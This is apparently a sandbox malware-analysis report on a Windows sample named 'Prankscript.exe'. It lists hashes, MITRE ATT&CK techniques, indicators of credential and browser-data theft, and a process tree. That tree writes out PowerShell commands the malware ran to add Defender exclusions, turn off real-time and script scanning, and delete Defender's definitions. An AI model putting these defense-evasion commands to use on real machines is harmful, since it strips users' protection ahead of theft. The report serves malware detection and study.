bb74eeb349b280b04f90e7437f77eb53cfe209d7e4093c3ad093fc0be9817b3b

Resubmissions

22/03/2025, 04:07

250322-ep14rsxxaw 10

22/03/2025, 04:03

250322-emsplsxwhx 10

17/03/2025, 20:33

250317-zb8a5s1nz7 10

10/11/2024, 04:24

241110-e1n9casnhq 10

Analysis

max time kernel
150s
max time network
141s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags

arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
submitted
17/03/2025, 20:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Prankscript.exe
Size

69.0MB
MD5

2e5ec8b0a8af16b1d042367a86981938
SHA1

ecbacf37eefdf1154aef164b81b4242c96f13777
SHA256

bb74eeb349b280b04f90e7437f77eb53cfe209d7e4093c3ad093fc0be9817b3b
SHA512

fdacab5917ec8d3796f7382ca19fb932eb4f40ea07614229a7bfc57cfeacbb24c930b2857a59ccfb0a790e74cf465b009cefaf06fb17f9a250380871dc3f679f
SSDEEP

196608:bWfQecp8urErvI9pWjgN3ZdahF0pbH1AYfTRtQPCsZp/AA81s:Pp8urEUWjqeWxRR6zppas

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4204	powershell.exe
2024	powershell.exe
1496	powershell.exe
2052	powershell.exe
3332	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
796	cmd.exe
3496	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
1152	bound.exe
2940	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2308	Prankscript.exe
2308	Prankscript.exe
2308	Prankscript.exe
2308	Prankscript.exe
2308	Prankscript.exe
2308	Prankscript.exe
2308	Prankscript.exe
2308	Prankscript.exe
2308	Prankscript.exe
2308	Prankscript.exe
2308	Prankscript.exe
2308	Prankscript.exe
2308	Prankscript.exe
2308	Prankscript.exe
2308	Prankscript.exe
2308	Prankscript.exe
2308	Prankscript.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
2040	tasklist.exe
2032	tasklist.exe
1648	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2360	cmd.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001c00000002afc8-22.dat	upx
behavioral1/memory/2308-26-0x00007FF964750000-0x00007FF964E14000-memory.dmp	upx
behavioral1/files/0x001900000002afb2-28.dat	upx
behavioral1/files/0x001900000002afc4-32.dat	upx
behavioral1/memory/2308-31-0x00007FF97A730000-0x00007FF97A755000-memory.dmp	upx
behavioral1/memory/2308-50-0x00007FF97B8A0000-0x00007FF97B8AF000-memory.dmp	upx
behavioral1/files/0x001900000002afbd-49.dat	upx
behavioral1/files/0x001c00000002afbc-48.dat	upx
behavioral1/files/0x001900000002afbb-47.dat	upx
behavioral1/files/0x001900000002afb8-46.dat	upx
behavioral1/files/0x001900000002afb7-45.dat	upx
behavioral1/files/0x001c00000002afb6-44.dat	upx
behavioral1/files/0x001900000002afb5-43.dat	upx
behavioral1/files/0x001a00000002afb1-42.dat	upx
behavioral1/files/0x001900000002afcf-41.dat	upx
behavioral1/files/0x001c00000002afce-40.dat	upx
behavioral1/files/0x001900000002afcd-39.dat	upx
behavioral1/files/0x001900000002afc7-36.dat	upx
behavioral1/files/0x001900000002afc3-35.dat	upx
behavioral1/memory/2308-56-0x00007FF97A510000-0x00007FF97A53D000-memory.dmp	upx
behavioral1/memory/2308-58-0x00007FF97A690000-0x00007FF97A6AA000-memory.dmp	upx
behavioral1/memory/2308-60-0x00007FF97A4E0000-0x00007FF97A504000-memory.dmp	upx
behavioral1/memory/2308-62-0x00007FF9759E0000-0x00007FF975B5F000-memory.dmp	upx
behavioral1/memory/2308-64-0x00007FF97A4C0000-0x00007FF97A4D9000-memory.dmp	upx
behavioral1/memory/2308-66-0x00007FF97A4B0000-0x00007FF97A4BD000-memory.dmp	upx
behavioral1/memory/2308-68-0x00007FF979330000-0x00007FF979363000-memory.dmp	upx
behavioral1/memory/2308-73-0x00007FF975540000-0x00007FF97560D000-memory.dmp	upx
behavioral1/memory/2308-81-0x00007FF97A510000-0x00007FF97A53D000-memory.dmp	upx
behavioral1/memory/2308-84-0x00007FF975250000-0x00007FF97536B000-memory.dmp	upx
behavioral1/memory/2308-80-0x00007FF979300000-0x00007FF97930D000-memory.dmp	upx
behavioral1/memory/2308-79-0x00007FF979310000-0x00007FF979324000-memory.dmp	upx
behavioral1/memory/2308-76-0x00007FF97A730000-0x00007FF97A755000-memory.dmp	upx
behavioral1/memory/2308-75-0x00007FF964220000-0x00007FF964749000-memory.dmp	upx
behavioral1/memory/2308-72-0x00007FF964750000-0x00007FF964E14000-memory.dmp	upx
behavioral1/memory/2308-115-0x00007FF97A4E0000-0x00007FF97A504000-memory.dmp	upx
behavioral1/memory/2308-186-0x00007FF9759E0000-0x00007FF975B5F000-memory.dmp	upx
behavioral1/memory/2308-283-0x00007FF979330000-0x00007FF979363000-memory.dmp	upx
behavioral1/memory/2308-294-0x00007FF975540000-0x00007FF97560D000-memory.dmp	upx
behavioral1/memory/2308-296-0x00007FF964220000-0x00007FF964749000-memory.dmp	upx
behavioral1/memory/2308-316-0x00007FF97A730000-0x00007FF97A755000-memory.dmp	upx
behavioral1/memory/2308-315-0x00007FF964750000-0x00007FF964E14000-memory.dmp	upx
behavioral1/memory/2308-321-0x00007FF9759E0000-0x00007FF975B5F000-memory.dmp	upx
behavioral1/memory/2308-340-0x00007FF975540000-0x00007FF97560D000-memory.dmp	upx
behavioral1/memory/2308-345-0x00007FF964220000-0x00007FF964749000-memory.dmp	upx
behavioral1/memory/2308-339-0x00007FF979330000-0x00007FF979363000-memory.dmp	upx
behavioral1/memory/2308-338-0x00007FF97A4B0000-0x00007FF97A4BD000-memory.dmp	upx
behavioral1/memory/2308-337-0x00007FF97A4C0000-0x00007FF97A4D9000-memory.dmp	upx
behavioral1/memory/2308-336-0x00007FF9759E0000-0x00007FF975B5F000-memory.dmp	upx
behavioral1/memory/2308-335-0x00007FF97A4E0000-0x00007FF97A504000-memory.dmp	upx
behavioral1/memory/2308-334-0x00007FF97A690000-0x00007FF97A6AA000-memory.dmp	upx
behavioral1/memory/2308-333-0x00007FF97A510000-0x00007FF97A53D000-memory.dmp	upx
behavioral1/memory/2308-332-0x00007FF97B8A0000-0x00007FF97B8AF000-memory.dmp	upx
behavioral1/memory/2308-331-0x00007FF97A730000-0x00007FF97A755000-memory.dmp	upx
behavioral1/memory/2308-330-0x00007FF964750000-0x00007FF964E14000-memory.dmp	upx
behavioral1/memory/2308-344-0x00007FF975250000-0x00007FF97536B000-memory.dmp	upx
behavioral1/memory/2308-343-0x00007FF979300000-0x00007FF97930D000-memory.dmp	upx
behavioral1/memory/2308-342-0x00007FF979310000-0x00007FF979324000-memory.dmp	upx

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2344_549383123\manifest.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2344_549383123\manifest.fingerprint	msedge.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
724	PING.EXE
3868	cmd.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5012	cmd.exe
400	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4400	WMIC.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2028	systeminfo.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133867173481947432"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-994669834-3080981395-1291080877-1000\{7795A64C-AA22-43F0-8C8F-95A23F39ED40}	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-994669834-3080981395-1291080877-1000\{4E3F4DF8-F56D-47BB-89DB-7197362B3175}	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-994669834-3080981395-1291080877-1000\{8B76A287-9ACE-4D93-9E47-453869FA50B4}	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
724	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
4204	powershell.exe
2024	powershell.exe
1496	powershell.exe
4204	powershell.exe
2024	powershell.exe
1496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
4604	powershell.exe
4604	powershell.exe
4604	powershell.exe
2052	powershell.exe
2052	powershell.exe
3836	powershell.exe
3836	powershell.exe
3332	powershell.exe
3332	powershell.exe
2128	powershell.exe
2128	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
2344	msedge.exe
2344	msedge.exe
2344	msedge.exe
2344	msedge.exe
2344	msedge.exe
2344	msedge.exe
2344	msedge.exe
2344	msedge.exe
2344	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4204	powershell.exe
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	1496	powershell.exe
Token: SeDebugPrivilege	2040	tasklist.exe
Token: SeDebugPrivilege	2032	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4628	WMIC.exe
Token: SeSecurityPrivilege	4628	WMIC.exe
Token: SeTakeOwnershipPrivilege	4628	WMIC.exe
Token: SeLoadDriverPrivilege	4628	WMIC.exe
Token: SeSystemProfilePrivilege	4628	WMIC.exe
Token: SeSystemtimePrivilege	4628	WMIC.exe
Token: SeProfSingleProcessPrivilege	4628	WMIC.exe
Token: SeIncBasePriorityPrivilege	4628	WMIC.exe
Token: SeCreatePagefilePrivilege	4628	WMIC.exe
Token: SeBackupPrivilege	4628	WMIC.exe
Token: SeRestorePrivilege	4628	WMIC.exe
Token: SeShutdownPrivilege	4628	WMIC.exe
Token: SeDebugPrivilege	4628	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4628	WMIC.exe
Token: SeRemoteShutdownPrivilege	4628	WMIC.exe
Token: SeUndockPrivilege	4628	WMIC.exe
Token: SeManageVolumePrivilege	4628	WMIC.exe
Token: 33	4628	WMIC.exe
Token: 34	4628	WMIC.exe
Token: 35	4628	WMIC.exe
Token: 36	4628	WMIC.exe
Token: SeDebugPrivilege	3496	powershell.exe
Token: SeIncreaseQuotaPrivilege	4628	WMIC.exe
Token: SeSecurityPrivilege	4628	WMIC.exe
Token: SeTakeOwnershipPrivilege	4628	WMIC.exe
Token: SeLoadDriverPrivilege	4628	WMIC.exe
Token: SeSystemProfilePrivilege	4628	WMIC.exe
Token: SeSystemtimePrivilege	4628	WMIC.exe
Token: SeProfSingleProcessPrivilege	4628	WMIC.exe
Token: SeIncBasePriorityPrivilege	4628	WMIC.exe
Token: SeCreatePagefilePrivilege	4628	WMIC.exe
Token: SeBackupPrivilege	4628	WMIC.exe
Token: SeRestorePrivilege	4628	WMIC.exe
Token: SeShutdownPrivilege	4628	WMIC.exe
Token: SeDebugPrivilege	4628	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4628	WMIC.exe
Token: SeRemoteShutdownPrivilege	4628	WMIC.exe
Token: SeUndockPrivilege	4628	WMIC.exe
Token: SeManageVolumePrivilege	4628	WMIC.exe
Token: 33	4628	WMIC.exe
Token: 34	4628	WMIC.exe
Token: 35	4628	WMIC.exe
Token: 36	4628	WMIC.exe
Token: SeDebugPrivilege	1648	tasklist.exe
Token: SeDebugPrivilege	4604	powershell.exe
Token: SeDebugPrivilege	2052	powershell.exe
Token: SeDebugPrivilege	3836	powershell.exe
Token: SeIncreaseQuotaPrivilege	4944	WMIC.exe
Token: SeSecurityPrivilege	4944	WMIC.exe
Token: SeTakeOwnershipPrivilege	4944	WMIC.exe
Token: SeLoadDriverPrivilege	4944	WMIC.exe
Token: SeSystemProfilePrivilege	4944	WMIC.exe
Token: SeSystemtimePrivilege	4944	WMIC.exe
Token: SeProfSingleProcessPrivilege	4944	WMIC.exe
Token: SeIncBasePriorityPrivilege	4944	WMIC.exe
Token: SeCreatePagefilePrivilege	4944	WMIC.exe
Token: SeBackupPrivilege	4944	WMIC.exe
Token: SeRestorePrivilege	4944	WMIC.exe
Token: SeShutdownPrivilege	4944	WMIC.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
2344	msedge.exe
2344	msedge.exe
2344	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2076 wrote to memory of 2308	2076	Prankscript.exe	78
PID 2076 wrote to memory of 2308	2076	Prankscript.exe	78
PID 2308 wrote to memory of 3264	2308	Prankscript.exe	79
PID 2308 wrote to memory of 3264	2308	Prankscript.exe	79
PID 2308 wrote to memory of 2680	2308	Prankscript.exe	80
PID 2308 wrote to memory of 2680	2308	Prankscript.exe	80
PID 2308 wrote to memory of 3320	2308	Prankscript.exe	82
PID 2308 wrote to memory of 3320	2308	Prankscript.exe	82
PID 2308 wrote to memory of 1960	2308	Prankscript.exe	84
PID 2308 wrote to memory of 1960	2308	Prankscript.exe	84
PID 2308 wrote to memory of 2360	2308	Prankscript.exe	86
PID 2308 wrote to memory of 2360	2308	Prankscript.exe	86
PID 3320 wrote to memory of 4204	3320	cmd.exe	89
PID 3320 wrote to memory of 4204	3320	cmd.exe	89
PID 2360 wrote to memory of 4216	2360	cmd.exe	91
PID 2360 wrote to memory of 4216	2360	cmd.exe	91
PID 1960 wrote to memory of 1152	1960	cmd.exe	90
PID 1960 wrote to memory of 1152	1960	cmd.exe	90
PID 3264 wrote to memory of 2024	3264	cmd.exe	92
PID 3264 wrote to memory of 2024	3264	cmd.exe	92
PID 2308 wrote to memory of 1276	2308	Prankscript.exe	94
PID 2308 wrote to memory of 1276	2308	Prankscript.exe	94
PID 1152 wrote to memory of 2400	1152	bound.exe	95
PID 1152 wrote to memory of 2400	1152	bound.exe	95
PID 2308 wrote to memory of 3588	2308	Prankscript.exe	93
PID 2308 wrote to memory of 3588	2308	Prankscript.exe	93
PID 2680 wrote to memory of 1496	2680	cmd.exe	97
PID 2680 wrote to memory of 1496	2680	cmd.exe	97
PID 1276 wrote to memory of 2040	1276	cmd.exe	99
PID 1276 wrote to memory of 2040	1276	cmd.exe	99
PID 3588 wrote to memory of 2032	3588	cmd.exe	100
PID 3588 wrote to memory of 2032	3588	cmd.exe	100
PID 2308 wrote to memory of 2604	2308	Prankscript.exe	102
PID 2308 wrote to memory of 2604	2308	Prankscript.exe	102
PID 2308 wrote to memory of 796	2308	Prankscript.exe	104
PID 2308 wrote to memory of 796	2308	Prankscript.exe	104
PID 2308 wrote to memory of 2704	2308	Prankscript.exe	106
PID 2308 wrote to memory of 2704	2308	Prankscript.exe	106
PID 2308 wrote to memory of 3564	2308	Prankscript.exe	140
PID 2308 wrote to memory of 3564	2308	Prankscript.exe	140
PID 2308 wrote to memory of 5012	2308	Prankscript.exe	108
PID 2308 wrote to memory of 5012	2308	Prankscript.exe	108
PID 2308 wrote to memory of 2556	2308	Prankscript.exe	111
PID 2308 wrote to memory of 2556	2308	Prankscript.exe	111
PID 2308 wrote to memory of 1064	2308	Prankscript.exe	113
PID 2308 wrote to memory of 1064	2308	Prankscript.exe	113
PID 2604 wrote to memory of 4628	2604	cmd.exe	116
PID 2604 wrote to memory of 4628	2604	cmd.exe	116
PID 796 wrote to memory of 3496	796	cmd.exe	117
PID 796 wrote to memory of 3496	796	cmd.exe	117
PID 5012 wrote to memory of 400	5012	cmd.exe	118
PID 5012 wrote to memory of 400	5012	cmd.exe	118
PID 2704 wrote to memory of 1648	2704	cmd.exe	119
PID 2704 wrote to memory of 1648	2704	cmd.exe	119
PID 3564 wrote to memory of 4884	3564	cmd.exe	120
PID 3564 wrote to memory of 4884	3564	cmd.exe	120
PID 1064 wrote to memory of 4604	1064	cmd.exe	122
PID 1064 wrote to memory of 4604	1064	cmd.exe	122
PID 2556 wrote to memory of 2028	2556	cmd.exe	121
PID 2556 wrote to memory of 2028	2556	cmd.exe	121
PID 2308 wrote to memory of 3144	2308	Prankscript.exe	123
PID 2308 wrote to memory of 3144	2308	Prankscript.exe	123
PID 3144 wrote to memory of 2828	3144	cmd.exe	125
PID 3144 wrote to memory of 2828	3144	cmd.exe	125

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4216	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Prankscript.exe
"C:\Users\Admin\AppData\Local\Temp\Prankscript.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2076
- C:\Users\Admin\AppData\Local\Temp\Prankscript.exe
  "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Prankscript.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3264
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Prankscript.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3320
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1960
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1152
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\7937.tmp\7938.tmp\7939.vbs //Nologo
        5⤵
        
        PID:2400
      - C:\Windows\System32\notepad.exe
        
        "C:\Windows\System32\notepad.exe"
        6⤵
        
        PID:4976
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=IQDWOHB_kpI
        6⤵
        Drops file in Windows directory
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Modifies registry class
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:2344
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e0,0x2e4,0x2e8,0x2dc,0x304,0x7ff96434f208,0x7ff96434f214,0x7ff96434f220
        7⤵
        
        PID:124
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1820,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:11
        7⤵
        
        PID:4484
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2164,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=2160 /prefetch:2
        7⤵
        
        PID:3708
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2560,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=2556 /prefetch:13
        7⤵
        
        PID:4304
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3420,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=3504 /prefetch:1
        7⤵
        
        PID:2972
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3428,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:1
        7⤵
        
        PID:3944
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4048,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=4068 /prefetch:1
        7⤵
        
        PID:3712
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4084,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=4132 /prefetch:9
        7⤵
        
        PID:3256
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4252,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=4352 /prefetch:1
        7⤵
        
        PID:1900
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=4428,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=4492 /prefetch:9
        7⤵
        
        PID:676
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
